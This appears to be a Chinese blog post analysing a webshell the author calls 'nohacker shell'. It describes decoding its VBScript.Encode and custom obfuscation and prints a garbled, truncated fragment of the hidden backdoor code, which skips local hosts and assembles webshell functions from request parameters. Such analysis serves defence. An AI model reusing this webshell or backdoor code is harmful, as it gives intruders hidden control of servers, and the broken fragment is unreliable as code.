shell界面 在shell的明文里看到这么一句话—破解是能力,共享是精神(内部使用) …NoHacker,所以我就叫他nohacker shell了。解密思路一样,先是VBScript.Encode解密,然后自定义函数解密。 完全解密后,shell后门代码就出来了,
if Instr(Serveru,”127.0.0.1″)<>0 or Instr(Serveru,”192.168.”)<>0 or Instr(Serveru,”http:// “)<>0 then else if session(“servec”)=1 then session(“servec”)=session(“servec”)+1 code=”
“” & Err.Description & “”“”:Err.Clear:Response.Flush:End If:end sub:Sub RRS(str):response.write(str):End Sub:Function RePath(S):RePath=Replace(S,””\””,””\\””):End Function:Function RRePath(S):RRePath=Replace(S,””\\””,””\””):End Function:URL=Request.ServerVariables(“”URL””):ServerIP=Request.ServerVariables(“”LOCAL_ADDR””):Action=Request(“”Action””):Pos=2:RootPath=Server.MapPath(“”.””):WWWRoot=Server.MapPath(“”/””):Serveru=request.servervariables(“”http_host””)&url:FolderPath=Request(“”FolderPath””):Pn=pos*44:FName=Request(“”FName””):BackUrl=””
返回 “””
RRS”
”
RRS”
“&ServerIP&” ”
RRS”
” RRS”” rrs “
”
………………………………………………………………………………..
加密下载: 点击下载此文件 最开始出于共享的目的,发布了解密的源码,但是很多朋友劝说我,那么解密文件就不发布了。
解密的奥运专版网站维护工具(加强版)及后门全分析 ”无尽的渗透“webshell的解密和后门全分析